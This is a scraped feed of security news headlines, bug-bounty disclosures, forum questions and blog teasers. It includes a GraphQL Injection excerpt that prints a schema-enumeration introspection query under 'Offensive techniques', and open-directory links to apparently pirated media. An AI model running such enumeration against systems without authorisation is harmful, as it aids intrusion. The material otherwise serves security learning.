    Read-only administrator can change agent update settings
    Acronis disclosed a bug submitted by mega7: https://hackerone.com/reports/1538004 - Bounty: $200

    Rails (Ruby on Rails)
    🔍 Introduction Rails (Ruby on Rails, RoR) is Ruby's flagship framework: a full-stack web framework built on the MVC model. Thanks to Ruby's easy and intuitive syntax, Rails code is not hard to understand either, and features such as scaffold let you build a web service quickly. Beyond that, many of the technologies, techniques and security aspects needed for developing a web service have been taken into account. Installation sudo gem install rails Structure of Rails app Model config/database.yml : DB connection information and settings db/migrate/* : active_record related code app/models/* : code related to models (DB schema) View app/views/* : View code connected to the Models and Controllers Controller app/controllers/* : controller code config/routes.rb : code where the actual routing is specified Etc config/* : application settings public/* : public directory 🕹 Snippet New Web App rails new {appname} New API App rails new {appname} --api or # config/application.rb config.api_only = true Generate with scaffold scaffold is a feature that generates the MVC (Model, View, Controller) in a single command. rails g scaffold post title:string context:text types string text (long text, up to 64k, often used for text areas) datetime date integer binary boolean float decimal (for financial data) time timestamp references Migrate DB New model rails g model Scans name:string url:string Migration rake db:migrate Rollback rake db:rollback # reverts to the most recent DB state rake db:rollback STEP=2 #...

    LyScript: an x64dbg automation debugging plugin
    An x64dbg automation control plugin that implements remote dynamic debugging. It addresses the problem that native scripts are not powerful enough for reverse engineers analyzing vulnerabilities and anti-virus staff unpacking samples, speeds up exploit development, and assists vulnerability discovery and malware analysis.
    What is IPv6 translation technology? A brief look at the two technical approaches to IPv6 translation
    Compared with dual-stack and tunneling, IPv6 translation technology has the advantages of a short migration period, low cost and flexible deployment, and is currently the main way major government and enterprise websites carry out IPv6 upgrades.
    FreeBuf Morning Report | Fake-order telecom network fraud cases account for 40% of all telecom fraud cases; new malicious Python libraries found on PyPI
    The industry standard "Cloud Computing Security Shared Responsibility Model" was officially released and took effect in July 2022.
    Reproducing Tomcat middleware vulnerabilities
    Reproduction of some Tomcat vulnerabilities
    Warning! Hackers are stealing credit cards from classified-ad websites
    The attackers also tried to use one-time passwords (OTP) on banking platforms to transfer funds directly into their own accounts.
    New malicious Python libraries found on PyPI
    Check Point security researchers discovered 10 malicious packages on the Python Package Index (PyPI).
    CISA warns that Windows and UnRAR vulnerabilities are being exploited in the wild
    Recently the US Cybersecurity and Infrastructure Security Agency (CISA) added two vulnerabilities to its Known Exploited Vulnerabilities catalog. One of them has lurked as a zero-day in the Windows Support Diagnostic Tool (MSDT) for more than two years and has publicly available exploit code. Both security issues are rated high severity and are directory traversal vulnerabilities that can help attackers plant malware on target systems. The vulnerability, tracked as CVE-2022-34713 and informally called DogWalk, is a security flaw in MSDT that allows attackers
    After Twilio, Cloudflare employees were hit by the same phishing attack
    At least 76 employees received phishing text messages on their personal or work phone numbers, and some messages were also sent to employees' family members.

    Repost: TV Shows, audiobooks, NSFW content
    This was posted a year ago, but is still up with content people might be interested in if they missed this post (https://www.reddit.com/r/opendirectories/comments/ox9ife/08032021_daily_post/) http://195.154.165.20/data/TDownloads/ submitted by /u/JiminythecricketinOz

    Best ways to practice X86 Win exploit dev?
    Hi all :) I've currently started taking the OSED course from Offsec, and my lab is starting to run out (30 days). I kinda finished all of the exercises there anyway. Are there any recommendations on exploit exercises/sites focusing on Win x86 I can take? Monthly subscription sites are also fine if they are worth it. Exercises including RE are fine, but even better are ones with only a "PoC" script (access violation), as I feel my main focus should be on the exploit building. Thank you! submitted by /u/Tasty_Diamond_69420


    SD-PWN Part 4 — VMware VeloCloud — The Last Takeover?
    submitted by /u/biggorilla135
    Discovering Domains via a Timing Attack on Certificate Transparency
    submitted by /u/0xdea
    Microsoft Office to publish symbols starting August 2022
    submitted by /u/TheDarthSnarf
    Security Best Practices in PHP
    submitted by /u/pigoretee
    LibAFL: A Framework to Build Modular and Reusable Fuzzers
    submitted by /u/domenukk
    Advisory: Cisco Small Business RV Series Routers Web Filter Database Update Command Injection Vulnerability
    submitted by /u/g_e_r_h_a_r_d
    Auditing Crypto Wallets
    submitted by /u/catlasshrugged

    Execution Unit Scheduler Contention Side-Channel Vulnerability on AMD Processors
    Article URL: https://www.amd.com/en/corporate/product-security/bulletin/amd-sb-1039 Comments URL: https://news.ycombinator.com/item?id=32404209 Points: 2 # Comments: 0
    CVE-2020-2038: PAN-OS version 10.0 suffers from remote code exec vulnerability
    Article URL: https://security.paloaltonetworks.com/CVE-2020-2038 Comments URL: https://news.ycombinator.com/item?id=32400260 Points: 1 # Comments: 1

    Get The Best Red-Team Penetration Testing
    The ‘red-team’ penetration test simulates real attack scenarios (“Friendly Hacking”) by bypassing security defenses while remaining… Continue reading on Medium »
    VAPT — Common & Uncommon Interview Questions! Episode-2
    This is a continuation of the amazing Common & Uncommon Interview Questions for VAPT. If you haven’t read the first article you can find… Continue reading on Medium »

    [CRITICAL] Full account takeover without user interaction on sign with Apple flow
    Glassdoor disclosed a bug submitted by emanelyazji: https://hackerone.com/reports/1639802 - Bounty: $3000
    Ability to escape database transaction through SQL injection, leading to arbitrary code execution
    HackerOne disclosed a bug submitted by jobert: https://hackerone.com/reports/1663299

    End to End: Testing Go Services
    A comprehensive example of testing at every layer. Continue reading on Udacity Eng & Data »

    Creating a basic backdoor on an android mobile
    Stored XSS to Account Takeover : Going beyond document.cookie (Dumping IndexedDB)
    PortSwigger Web Security Academy Lab: SQL injection vulnerability allowing login bypass
    About the discovery of another security vulnerability in NASA
    IW Weekly #15: Admin account takeover, IDOR broken authentication, CyberChef alternatives, Dark web…

    Novel News on Cuba Ransomware aka Greetings From Tropical Scorpius
    Tropical Scorpius has been deploying Cuba Ransomware using novel tools and techniques, such as a new malware family, ROMCOM RAT. The post Novel News on Cuba Ransomware aka Greetings From Tropical Scorpius appeared first on Unit 42.

    SecWiki News 2022-08-09 Review
    How to import billions of DNS records into Elasticsearch by BaCde; Fuzzing: Grammars by 路人甲; SharpTongue Deploys Clever Mail-Stealing Browser Extension by 路人甲. For more of the latest articles, visit SecWiki

    Bluey, movies and workout videos.
    submitted by /u/littlepreptalk
    A website which has a lot of PDF files, mostly all scams.
    !!!DO NOT GO TO THESE SITES PROMISING FREE STUFF, IT'S ALL A SCAM AND THEY WILL HACK YOU NO MATTER WHAT YOU DO!!! This site used to belong to a school located in India, which apparently was botted out by hackers. This website would fill up with a load of PDF files with scams in them. Some are fake "I'm not a robot" verifications, some are Free Robux scams, some are relating to Minecraft scams, and many more. Files that belonged to the school still remain though. And another thing, files that belong to the school have names and important information in the PDFs. Read them at your own risk. There's now a new website that belongs to the school, and it still exists today, a school located in India named "Salwan Public School, Gurugram". If you want to check it out for yourself, here are the links: Hacked Indian school website New Indian school website (not hacked) Basically it's the same domain but the new website removed the "www" in the link. submitted by /u/SinisterYT06

    GraphQL Injection
    🔍 Introduction GraphQL Injection refers to injection attacks in environments that use GraphQL. Because of the nature of GraphQL, the query a user requests is processed by one or more servers and the result is returned, so it is not simply a GraphQL-only problem but is likely to lead on to other vulnerabilities such as SQL Injection or XXE. In the narrow sense, therefore, it means attacks on GraphQL itself, that is, between the Schema and the Query; in the broad sense it also includes issues caused by back-end processing (SQLi, XXE, etc.). For general GraphQL security content, see "Cullinan > GraphQL Security". 🗡 Offensive techniques Detect Every part of a service that uses GraphQL is a testing point. Paths such as /graphql are commonly used, and even when the path differs, a request containing query is checked as a GraphQL service. Once the GraphQL endpoint is found, try to trigger unintended behaviour or errors by placing special characters in the Schema and Query areas. Exploitation Enum via Introspection Query The Introspection Query is a query GraphQL provides so that information about the schema and queries can be queried. It is a query technique using __schema, and the query can be composed to query the entire GraphQL structure. query IntrospectionQuery { __schema { queryType { name } mutationType { name } subscriptionType { name } types { ...FullType } directives { name description locations args { ...InputValue } } } } fragment FullType on __Type { kind name description fields(includeDeprecated: true) { name description args { ...InputValue } type { ...TypeRef } isDeprecated...

    Free tool to process forensic artefacts (DD, Kape etc.) in AWS
    https://www.cadosecurity.com/cado-community-edition/ submitted by /u/zenomeno
    Zero to Hero Malware Reverse Engineering & Threat Intelligence
    submitted by /u/cybersocdm
    How to export all data from Confluence
    Does anyone know how I can export the entire Confluence for the organization? It seems that native export is missing calendars and blogs. submitted by /u/urengoy
    How to quarantine/isolate a laptop?
    I have a laptop coming in for forensic examination and I am nervous. The EDR software we have on it has a quarantine feature that failed. So far I have remotely shut down the computer, reset the user's password and disabled the computer account in AD. I am afraid when I turn it on it will auto-connect to the company wifi. I don't have a Faraday cage, but would a switch just connected to a power source and nothing else be sufficient? submitted by /u/Enes_24

    Everything you need to know about starting a career in bug bounty hunting
    Introduction Continue reading on Medium »
    TOP Cross-Chain Bridge Open Test Is Underway
    Since the emergence of DeFi, the congestion and high GAS fees of the Ethereum has hit heated discussions and led to the emergence of many… Continue reading on TOP Network »
    Pentester Promiscuous Notebook
    gitbook for keeping my pentest notes on hand. It’s far from being perfect in terms of organization (that’s why I call it “promiscuous”)… Continue reading on Medium »
    How Bug Bounty Can Help You Gain Confidence
    If you’re looking for a way to gain confidence, earn some extra money and get a job as a penetration tester, then bug bounty might be for… Continue reading on Medium »

    FreeBuf Morning Report | Google Search suffers a global outage; personal information leaked from multiple e-commerce platforms
    Reportedly, more than 40,000 people in the US reported being unable to use Google Search, and users in the UK, Australia and Singapore also reported the Google outage.
    FreeBuf Chengdu cybersecurity enterprise survey officially launched
    Local cybersecurity vendors are cordially invited to take part and sign up!
    Enterprise Network Security Best Practice Guide (Part 7)
    This series consists of 8 articles that mainly share the author's own lessons from building enterprise network security and ensuring its operation, covering network security management, architecture, technology and practice, aiming to describe every aspect of enterprise network security comprehensively and to give enterprise network security
    Enterprise Network Security Best Practice Guide (Part 6)
    This series consists of 8 articles that mainly share the author's own lessons from building enterprise network security and ensuring its operation, covering network security management, architecture, technology and practice, aiming to describe every aspect of enterprise network security comprehensively and to give enterprise network security
    Tophant attends the CICV Tech Week special forum to discuss building Internet of Vehicles security capabilities
    2022-8-9 23:58:59
    How attackers adapt and evolve after Microsoft disabled macros
    Researchers believe attackers will increasingly use container-type files for delivery, reducing their reliance on macro-code attachments.
    Meta cracks down on cyberattack campaigns abusing Facebook in South Asia
    Facebook parent Meta disclosed that it took countermeasures against two attack groups in South Asia, both of which used its social media platform to distribute malware to potential targets.
    Employees phished: customer data of cloud communications giant Twilio leaked
    Twilio said attackers used an SMS phishing attack to steal employee credentials, infiltrated internal systems and leaked some customer data.
    7-Eleven stores in Denmark close due to a cyberattack
    After a cyberattack, the payment and checkout systems at 7-Eleven stores in Denmark failed completely, so the stores chose to close.

    Browsers automatically connect to ports 8008 and 8009
    Hi, I checked the open TCP connections on my machine using Sysinternals TCPView. I saw that I have open connections from Chrome to ports 8008 and 8009 on a machine in my LAN. It seems like the address of my Xiaomi Mi Box. I noticed that when I open Chrome/Firefox/Edge it automatically connects to this address and these ports. I performed a quick Google search and didn't find too much information about these ports, but some mention them as related to Chromecast. I'm trying to understand if this is something legit, and what makes my browser automatically connect to this address; is there some sort of auto-discovery process for these devices? Or is it possible (hopefully not) that I have some malware? Any information will be appreciated. Thanks, Gabriel submitted by /u/gabrielszt
    I rooted my phone. Am I compromised?
    I used FonePaw data recovery tool's Android root feature to root my phone. The recovery failed, but I sure as hell am rooted. Certain apps on my Android home page have changed location several times without me doing it. Sometimes I see my phone light up like getting a notification but don't get anything. Is my phone compromised? submitted by /u/remidentity

    Fuzzing: Grammars
    Author: 时钟@RainSec. This article is a contribution from the author; Seebug Paper looks forward to your submissions, and every accepted one receives a gift! Submission email: paper@seebug.org Fuzzing input One core idea of fuzzing is to use a large volume of inputs to trigger the program's various branch logic, so the success of fuzzing is closely tied to input generation. Inputs come in many formats: files, code, JSON data and so on. But the various...
    Breaking the pebble template injection restrictions in a Spring scenario
    Author: Y4tacker Original link: https://tttang.com/archive/1692/ Preface I was busy with QWB (强网杯) last weekend and only got halfway through this challenge before setting it aside, finally stuck at bypassing RCE in the latest pebble template engine. Today I'm taking the time to continue the remaining analysis; the challenge also has a few tricks usable in real-world scenarios that I'll share along the way. Challenge environment analysis A pretty good challenge; it directly provides a docker environment for easy local setup, and also sets permissions that require running ./g...

    Storm Kitty Reversal by Your friendly Homeless Hacker / Reverser
    Prynt Stealer Stub 4.5.1 We can see there are around 13 classes in the MSIL executable that consist of screen clipping keylogging stealers… Continue reading on Medium »


    An Attacker's Perspective
    Something I've thought about quite often during my time in DFIR is the threat actor's perspective...what is the attacker seeing and thinking during their time in an infrastructure. As a DFIR analyst, I don't often get to 'see' the threat actor's actions, at least not fully. Rather, my early perspective was based solely on what was left behind. That's changed and expanded over the years, as we've moved from WinXP/2000/2003 to Win7 and Win10, and added some modicum of enterprise capability by deploying EDR. During the better part of my time as a responder, EDR was something deployed after an incident had been detected, but the technology we deployed at that time had a targeted "look back" capability that most current EDR technologies do not incorporate. This allowed us to quickly target the …

    Why do we still use unencrypted networking protocols (like HTTP)?
    Networking novice here, been messing around with Wireshark and noticed that some services, including Microsoft, call out to external servers using HTTP instead of HTTPS. I'm curious what advantages HTTP offers that would make someone eschew the increased security of HTTPS. It seems to me -- admittedly as someone joining the game in the 8th inning in terms of networking's history -- that unsecured protocols should be deprecated. Is there something I'm missing? submitted by /u/DataMoreLikeShplada
    What would you do on your first day if you were the US Cyber Security Czar?
    What would you do on your first day as the US Cyber Security Czar and a budget in the billions of dollars? submitted by /u/greyyit

    How long should the Plaso ingest plugin from Autopsy take?
    (crossposted with r/digitalforensics) I'm running Autopsy 4.19.3 on a Win10 Enterprise VM using the Plaso ingest plugin on a 40GB .e01 image taken from a 256GB drive. I ran all the other ingest plugins I intended to use beforehand, closed the case, shut down Autopsy and restarted before I started the Plaso ingest. The VM is on ESXi 7; it has 16 cores (the host has 32), 128mb of RAM of which currently only 15GB is in use; the host has dual Xeon E5-2690 @ 2.90GHz. The ingest was started a week ago (2022/08/01 14:54 PDT) and the progress bar is still at 0%. log2timeline has been consistently maxing three cores the entire time and the file being worked on is changing when I click on the progress bar for its status. So it's doing something. How long is this going to eventually take? Is there anything in the case or Autopsy appdata folder that would give me more information? Is it possible to run a Plaso ingest with more than three log2timeline processes? submitted by /u/thenebular
    Snapchat Forensics
    Does anyone have a good link to where I can find more information about the databases in Snapchat? I have some snaps under the path "Snapchat Gallery/snaps/xxxxxx/xxxxxx.decrypted_media". I would like to know/confirm if the Snapchat Gallery/snaps folder contains ONLY media taken with the phone (so not snaps received). Does anyone have any experience with this? submitted by /u/agente_99
    Note Taking Methodology
    Hey everyone! I'm curious what everyone's note-taking methodology is? I'm kind of scatterbrained and I tend to leave little notes everywhere when doing a case. So I'm wondering what everyone else's methodology/tools are? I'm currently using Obsidian for notes but I know there is a better way. I've used Aurora but I feel like there is something lacking, but I'm not sure what. submitted by /u/shonen787
    Tips on finding a good mentor?
    Anyone have any recommendations as to where to find good mentors for blue teaming or DFIR? If not, can you share what made some of your mentors super valuable? Thanks! submitted by /u/tfulab23
    Question regarding which field to pick (Digital forensics V. eDiscovery)
    Hi, I am wondering what side of the field I should look into. I want to specifically do criminal investigation. Thank y'all, sorry for being bothersome. submitted by /u/swatteam23
    Question regarding how to learn how to use industry standard eDiscovery platforms, without being financially able to pay for training/tools.
    Hi all, I am going to college for CompEng, with a minor in DF&CompSec. I am wondering what tips you guys would have for learning how to utilize eDiscovery platforms, without much in the way of financial resources (for example EnCase and other tools). If you guys have any trainings or resources I can use freely (without the CIA having to kill me lol) that would be appreciated. :) Thanks. submitted by /u/swatteam23
    Cellebrite advanced logical vs file system
    I've just started my journey into digital forensics and I've been finding it difficult to understand and research what the difference is between Cellebrite's "Advanced Logical" extraction and its "Full File System". What are the capabilities and limitations of both types of extractions using Cellebrite? submitted by /u/holidaykid09

    What do Russians think about the war? Telegram data
    Can what messages people heart-emoji or cry-emoji tell us anything about public sentiment about the war? Continue reading on Medium »
    RAAVN™ is a powerful application, designed specifically by analysts for analysts, that sifts…
    Continue reading on Medium »

    GCHQ discovered significant vulnerability in Huawei equipment (2020)
    Article URL: https://news.sky.com/story/gchq-discovered-nationally-significant-vulnerability-in-huawei-equipment-12086688 Comments URL: https://news.ycombinator.com/item?id=32389632 Points: 13 # Comments: 0

    zathura - SELinux confined
    submitted by /u/esp0x31
    Security Guide for Startups: How to think about security while moving quickly | LunaSec
    submitted by /u/breadchris
    SimpleX Chat - the first messaging platform that has no user identifiers (not even random numbers) - v3.1 of iOS and Android apps released - with secret chat groups and server access via Tor.
    submitted by /u/epoberezkin
    How do you secure your DNS in the cloud? - DNS in the Cloud Capabilities
    submitted by /u/MiguelHzBz
    Targeted attack on industrial enterprises and public institutions [Kaspersky]
    submitted by /u/EspoJ
    Codewarrior - open source SAST
    submitted by /u/CoolerVoid

    The Grant Bounty
    We are thrilled to introduce the Grant Bounty as part of our V2 initiative to invite all players of Web3 to get involved in security. The… Continue reading on Medium »
    Arab Cyber War Games NoSQL Challenge (Doctor X).
    In this CTF I developed a Nosql challenge that needs the penetration tester to Inject in many forms to find the flag. Continue reading on Medium »
    Exploit SQL Injection and bypass captcha with SQLMAP
    Kenzy challenge (Cyber wargames 2022) Continue reading on Medium »
    Solace Partners with Hats Finance to Sponsor Bug Bounties
    Solace, the decentralized insurance provider, is partnering with Hats Finance to sponsor bug bounties for Solace-insured DApps. This… Continue reading on Solace.Fi »
    Stored XSS using SVG file
    Hey guys, hope you all are doing well. I am Bharat Singh a Security Researcher and bug hunter from India. In this writeup I am going to… Continue reading on Medium »
    JWT Common Attacks
    What Is JWT 🤔? Continue reading on Medium »
    Stored XSS in app.gitbook.com
    Hello friends, let me introduce myself: my name is Mohammad Alfin Hidayatullah and I am a bug bounty hunter. This time I want to share… Continue reading on Medium »
    From Shodan to RCE: That one time I hacked a Fortune 500 company.
    tl;dr: Continue reading on Medium »
    A simple JSON token opens an attack surface
    Or express-validator to the rescue! Continue reading on Geromics »
  • Open

    SecWiki News 2022-08-08 Review
    SecWiki Weekly (Issue 440) by ourren; CVE-2022-21999 by the SecIN community; VirusTotal summary report on malware abusing trust by Avenger. For more of the latest articles, visit SecWiki
  • Open

    Cyber wargames web challenges
    * * * Konan challenge * * * Continue reading on Medium »
  • Open

    Mainly Games, Music, SW and old flash
    http://home.darkok.xyz/ Was posted one year ago: give credit to the old publisher: https://www.reddit.com/user/JasonSec/ submitted by /u/Appropriate-You-6065 [link] [comments]
  • Open

    xmlrpc.php file is enabled; it can be used for brute-force attacks and denial of service (DoS)
    Top Echelon Software disclosed a bug submitted by anonymmert12: https://hackerone.com/reports/1622867
    Lack of rate limit while joining a password-protected video call in the Talk section
    Nextcloud disclosed a bug submitted by error2001: https://hackerone.com/reports/1596673 - Bounty: $250
  • Open

    Kubernetes Security
    No content preview
    PortSwigger Web Security Academy Lab: SQL injection vulnerability in WHERE clause allowing…
    No content preview
  • Open

    FreeBuf Morning Report | Serious flaw found in the US Emergency Alert System; GitLab bans the use of Windows
    The US government has warned of a serious vulnerability in its Emergency Alert System (EAS); GitLab was found to have a company policy prohibiting the use of Microsoft Windows.
    Security incident response: fight magic with magic!
    No content preview
    GwisinLocker ransomware launches extortion attacks against Windows and Linux ESXi servers
    The GwisinLocker ransomware family, which ships both Windows and Linux encryptors, has launched extortion attacks against South Korean healthcare, industrial and pharmaceutical companies.
    Snapchat and Amex websites abused in Microsoft 365 phishing attacks
    Attackers abused open redirects on the Snapchat and American Express websites in a series of phishing attacks aimed at stealing victims' Microsoft 365 credentials.
    CVE-2022-21999 vulnerability analysis
    CVE-2022-21999 (CVE-2022-22718) is a printer-related local privilege escalation vulnerability disclosed in Microsoft's February Patch Tuesday.
    JDBC attacks as seen at Black Hat
    Covers MySQL arbitrary file read, the use of allowUrlInLocalInfile, MySQL client deserialization, and more.
    NHS hit by cyberattack, major system outage
    The UK National Health Service (NHS) 111 emergency service was hit by a cyberattack, with major impact and ongoing outages of the service's systems.
    Twitter admits zero-day led to theft of 5.4 million users' data
    Twitter has officially confirmed that the vulnerability used by attackers last December is the same one that was reported and fixed in January this year, and revealed that it was introduced by a code update in June last year.

  • Open

    Blackbird: An OSINT tool to search for accounts by username
    submitted by /u/sanitybit [link] [comments]
    WinAPi Search - Recursively Search PE Binaries by Win32 Function Name
    submitted by /u/sanitybit [link] [comments]
    Technical analysis of syzkaller based fuzzers: It's not about VaultFuzzer!
    submitted by /u/hardenedvault [link] [comments]
  • Open

    SPY NEWS: 2022 — Week 31
    Summary of the espionage-related news stories for the Week 31 (31 July-6 August) of 2022. Continue reading on Medium »
    Execution in Olenivka (anatomy of a provocation)
    Let's try to analyze the chronology of events, what is known at the moment, and then draw conclusions. Continue reading on Medium »
    CyberSoc CTF — Life Online — OSINT — wagthetail
    Cyber Detective CTF is an OSINT-focussed CTF created by the Cyber Society at Cardiff University. Continue reading on Medium »
    CyberSoc CTF — Life Online — OSINT — choochoo
    Cyber Detective CTF is an OSINT-focussed CTF created by the Cyber Society at Cardiff University. Continue reading on Medium »
    CyberSoc CTF — Life Online — OSINT — Growing Up
    Cyber Detective CTF is an OSINT-focussed CTF created by the Cyber Society at Cardiff University. Continue reading on Medium »
    CyberSoc CTF — Life Online — OSINT — VOTE FOR ME
    Cyber Detective CTF is an OSINT-focussed CTF created by the Cyber Society at Cardiff University. Continue reading on Medium »
    Top 10 most rated OSINT Tools on Github
    author — SATYAM PATHANIA Continue reading on Medium »
  • Open

    Getsimple CMS 3.3.10 Exploit
    Hello, it's me again; this time I want to show my documentation of exploiting Getsimple CMS 3.3.10. Continue reading on Medium »
    Introduction Session Hijacking
    Session hijacking is defined as taking over an active TCP/IP communication session without the user’s permission. When implemented… Continue reading on Medium »
    Practical XPath Injection : Attack and Defense Techniques
    Practical XPath Injection Exploits Continue reading on Medium »
    XXE Attack : Real life attacks and code examples
    XXE (XML External Entity Injection) is a web-based security vulnerability that enables an attacker to interfere with the processing of XML… Continue reading on Medium »
    Bug Bounty — What, How, Why?
    Getting started with bug bounties Continue reading on Medium »
    How To Write A Penetration Testing Report
    A Penetration testing report is the only tangible product. Continue reading on Medium »
    How I got a $10,000 Penetration Testing Project/Job with Bug Bounty
    Introduction: Continue reading on Medium »
    Everything you need to know about Cyber Security:
    Cybersecurity is the protection of Internet-connected systems such as hardware, software, and data from cyber threats. Individuals and… Continue reading on Medium »
    2FA Bypass via Google Identity & OAuth Login
    Hello All, Continue reading on Medium »
    CodeShield: Cloud Asset Inventory & Privilege Escalation Toolkit
    Hello everybody! In this blog post, we will go through a Cloud Security Tool, I recently came across: Codeshield. Continue reading on Medium »
  • Open

    Containers Vulnerability Scanner: Trivy
    This article talks about Trivy, a simple and comprehensive vulnerability scanner for containers and other artifacts, suitable for continuous integration and testing. The post Containers Vulnerability Scanner: Trivy appeared first on Hacking Articles.
  • Open

    We always win
    [link] [comments]
  • Open

    open ports forensics
    Hey there, if you suspect an attacker got into your computer after you downloaded some "free" software, how can I see the history of open ports and traffic to another computer from the day I downloaded the software? submitted by /u/ArticleUseful211 [link] [comments]
    Recovering emojis from Android Cellebrite extraction?
    Working with analysts on an Android mobile extraction. Emojis are coming up as question mark wingdings in SMS/MMS conversations. Analysts are telling me that there's no way to get that information from Android extractions, only iOS. This doesn't sound right to me. Is there advice I can give them regarding how retrieve the emoji data? submitted by /u/md9918 [link] [comments]
    What are some more CS - Research oriented jobs?
    This is a fascinating field to work in, even from an IT perspective (not looking down upon it, it just may get repetitive for some after a while), however we don't frequently see more high-end/research oriented roles being talked about in the sub. Apart from malware analysis/reverse engineering, what are some other opportunities to work for in the digital forensics field? Or what about jobs not necessarily pertaining to OS forensics? One example I have read about would be development of tools for media forensics. One in particular is about extracting ENF from videos/audio recordings to determine the location where it was captured. Sounds cool! In case you want to read more: https://arxiv.org/pdf/1912.09428.pdf https://arxiv.org/pdf/1903.09884.pdf https://en.wikipedia.org/wiki/Electrical_network_frequency_analysis Certainly this is an already niche field among CS, but are the aforementioned roles even more niche, to the extent that they exist only in an academic context? submitted by /u/FF6B9EAD [link] [comments]
    GCFA - Study Tips
    I’m having a hard time studying RDP event IDs. Basically the entire IR part of Event IDs with different scenarios is giving me trouble. Any tips? How to best prepare for Book 2 of GCFA (Intrusion Analysis) submitted by /u/bigpoppaash [link] [comments]
  • Open

    ES File Explorer Open Port Vulnerability exploitation
    No content preview
    Enterprise: Active Directory Room From TryHackMe By Hashar Mujahid
    No content preview
    TryHackMe WriteUp: Agent T
    No content preview
    What is command injection and how to exploit it — StackZero
    No content preview
  • Open

    SecWiki News 2022-08-07 Review
    A brief discussion of open-source software supply chain risk by ourren; XSS in Gmail's Amp4Email by ourren; [HTB] Europa Writeup by 0x584a. For more of the latest articles, visit SecWiki
  • Open

    Hex? Imhex and Hexyl
    Which hex editor/viewer do you use? When Linux is my main OS I mostly use GHex and hexdump; on macOS, hexyl and vim (+plugins). Today I want to introduce ImHex, an excellent cross-platform hex editor. I now use the ImHex + hexyl combination myself :D Looking back through my post history I don't seem to have covered hexyl before, so today I'll talk about ImHex, a GUI-based hex editor, and hexyl, a CLI-based hex viewer. ImHex 🔍 A Hex Editor for Reverse Engineers, Programmers and people who value their retinas when working at 3 AM. That is ImHex's own description. It is simply a hex editor that sticks to its purpose, but it has powerful features in support of that. Beyond viewing and editing data, it can analyze data against patterns or render it as graphs. The bookmarking is very convenient too, and it supports a great many analysis features. See the link below for details! https://github.com/WerWolv/ImHex#features It supports most operating systems; download and install the latest release for your OS. Hexyl Hexyl is a CLI-based hex viewer. It cannot edit, but when you only need to look at data, especially while already working in a terminal, hexyl is a really good choice. Like ImHex it supports most operating systems and package managers. The common ones are below; you can also download from the Release page or follow the Installation guide. # macOS: brew install hexyl # Ubuntu: sudo apt install hexyl # Alpine: apk add hexyl References https://github.com/WerWolv/ImHex https://imhex.werwolv.net https://twitter.com/github/status/1554981700349960192...
  • Open

    UX Research Around Active Directory Security
    Hello everyone, I'm a User Experience Designer in a large security company that's currently building a product around identity security, including Active Directory and Azure AD. As I conduct my research, I try to determine how many domains an organization usually has (in varying scales, of course). How are they managed? Is there a team that manages specific domains across all forests? Does one team usually take care of all the domains and not care about the others? The purpose of this question is to understand if the user needs the option to toggle between domains rather than simply filtering data by "Domain Name". If you have any other comments regarding how you manage your domain security in your organization, it would be appreciated. Thank you very much! submitted by /u/RaspberryFair8362 [link] [comments]
  • Open

    Fuzzing in Go
    “Fuzz testing is a novel way to discover security vulnerabilities or bugs in software applications.” The concept of fuzzing was introduced… Continue reading on Better Programming »
  • Open

    Lots of free PDFs and other files on various subjects
    I found a link to someone's library on the internet. https://cdn.preterhuman.net/texts/ submitted by /u/ConstProgrammer [link] [comments]
    AC School
    submitted by /u/EGirlCollector [link] [comments]
  • Open

    Good one but severity of this kind of attack is very low.
    Continue reading on Medium »
  • Open

    HTTP PUT method is enabled downloader.ratelimited.me
    RATELIMITED disclosed a bug submitted by codeslayer137: https://hackerone.com/reports/545136
    Anonymous access control - Payments Status
    Omise disclosed a bug submitted by codeslayer137: https://hackerone.com/reports/1546726 - Bounty: $100
  • Open

    Phoenix Challenges -- Stack Zero
    Have been waiting for school to end for some time now to finally get back to exploit development. Finally got around to making my first exploit development writeup and wanted to share with the community. Looking forward to many more! https://secnate.github.io/ctf/phoenix/phoenix-stack-zero/?fbclid=IwAR1-XbyPP9rSrLArmTPqXNb1Tkfj_7E8_Qi3XFvaexEyZJPcuA1J_YeYkj8 Of course, any comments/feedback would be greatly appreciated! submitted by /u/ProgrammingBro123 [link] [comments]

  • Open

    Enterprise: Active Directory Room From TryHackMe
    You just landed in an internal network. You scan the network and there’s only the Domain Controller… Continue reading on InfoSec Write-ups »
    Php Object Injection Demo
    PHP Object Injection is an application level vulnerability that could allow an attacker to perform different kinds of malicious attacks… Continue reading on Medium »
    Web Application Reconnaissance Guide, Cybersec | Shubham Dhungana
    In this article, I’m going to document about the process to perform web application reconnaissance. Before reading this article, we must… Continue reading on Medium »
    PHP Object Injection
    A very common and critical vulnerability in PHP applications is PHP Object Injection. This blog post explains how they work and how they… Continue reading on Medium »
    Unsafe use of Reflection
    This vulnerability is caused by unsafe use of the reflection mechanisms in programming languages like Java or C# Continue reading on Medium »
    File Inclusion Demo
    This script is possibly vulnerable to file inclusion attacks. Continue reading on Medium »
    Code Injection
    Code Injection is the general term for attack types which consist of injecting code that is then interpreted/executed by the application… Continue reading on Medium »
    Bypassing File Type Filters
    Unrestricted File Upload — File Extension Filter Bypass Continue reading on Medium »
    Bypassing Directory Structure Filters
    Directory traversal (also known as file path traversal) is a web security vulnerability that allows an attacker to read arbitrary files on… Continue reading on Medium »
    Bypassing Filename Filters Demo
    One of the challenging factors to a Hacker in a web application attack is the file upload. The first step in every attack is to get some… Continue reading on Medium »
  • Open

    Windows Registry Standards?
    I'm using regshot to compare two registry snapshots against each other. Is there a standard for how to navigate around the potentially hundreds of registry changes that all look at the same to a beginner? submitted by /u/Jaruki_Jurakami [link] [comments]
    Which Wireshark book do you recommend?
    Hey there. I'm interested in learning Wireshark in my off-time from work, and I am trying to increase my time off screen, as I'm sure many of you stare at computers all day for work like me. So I'm looking for a physical book on Wireshark and packet analysis. There are a handful of well-reputed options on Amazon, but the budget's tight. Anyone read and would recommend any particular one of the well-known Wireshark books, like Wireshark 101 or Practical Packet Analysis? The reviews are all positive so it's tough to make a choice here. Many thanks. submitted by /u/DataMoreLikeShplada [link] [comments]
    Does HTTPS Basically Make Personal VPNs Useless for Security?
